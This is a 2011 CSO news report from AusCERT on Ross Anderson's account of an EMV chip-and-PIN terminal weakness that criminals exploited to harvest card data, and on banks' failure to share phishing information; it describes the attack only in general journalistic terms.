Credit card vulnerability still alive and well - AusCERT 2011

Lack of information sharing by banks helping phishing attacks

Cambridge University professor, Ross Anderson.

Cambridge University professor, Ross Anderson.

Global banks are yet to solve a vulnerability in the Europay, Mastercard and Visa (EMV) integrated circuit standard first rolled out in 2003, allowing hackers to place Trojan devices on point of sale hardware to harvest user and credit card information.

EMV is the global standard used by card providers for integrated circuit (IC) debit and credit cards used in point of sale terminals and automatic teller machines (ATMs).

However, Cambridge University Professor, Ross Anderson, said he had found a vulnerability in 2007 with the PIN entry devices (PEDs) used as part of the standard. Anderson, along with two students, conducted reverse engineering on the devices in 2007.

“We found that if you went into the back of the product and drilled in, you could drop a paper clip on to the wire which is the serial port between the pin pad and the smart card,” he said.

With this paper clip, he said the device could become a Trojan with enough data harvested from every transaction to make a mag stripe version of a card and use it at any ATM.

“We told the banks in October 2007 and they said `it’s not a problem because the criminals aren’t as clever as you Cambridge University chaps’. But this wasn’t true because bad guys were already doing it.”

In July 2008, cyber criminals gained access to a warehouse in Dubai where the devices were stored and managed to store a Trojan device under the keyboard. This device was used to harvest information from the users' cards.

“It was possible for people to have a transaction done in a bank and have their credentials stolen,” he said. “The bank would than sue the user for negilence because it was not their fault.”

“In 2003 we were the pioneers [of EMV] and were told it was going to solve problems,” he said. “From the bank’s point of view it was a great rollout because the deal with EMV was that if there was a dispute [with a payment], then the user was liable.”

According to Anderson, rather than solving the problem banks hoped fraud would decrease, rather than increase as happened in reality.

A worrying factor, Anderson said, was the continuing vulnerabilties with EMV chip and pin systems, coupled with the fact that banks, at least in the UK, do not share information about phishing and cybercriminal attacks.

“The banks need an incentive to get this right but they take a short term and country rather than global view of it,” he said.

“Banks could do better if they shared information on phishing,” said Anderson. “If bankers were rational than they wouldn’t have a problem.”

The lack of global and local laws mandating companies disclose phishing or hacking attempts against internal systems has continued to be a vocal point for many security experts.

Hamish Barwick travelled to AusCERT 2011 as a guest of AusCERT

Got a security tip-off? Contact Hamish Barwick at hamish_barwick at

Follow Hamish Barwick on Twitter: @HamishBarwick

Join the CSO newsletter!

Error: Please check your email address.

Tags Ross AndersonEMVphishingtrojanauscert 2011

More about Cambridge UniversityCERT AustraliaMastercardVisa

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Hamish Barwick

Latest Videos

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

  • 150x50

    IDG Live Webinar:The right collaboration strategy will help your business take flight

    Speakers - Mike Harris, Engineering Services Manager, Jetstar - Christopher Johnson, IT Director APAC, 20th Century Fox - Brent Maxwell, Director of Information Systems, THE ICONIC - IDG MC/Moderator Anthony Caruana

    Play Video

More videos

Blog Posts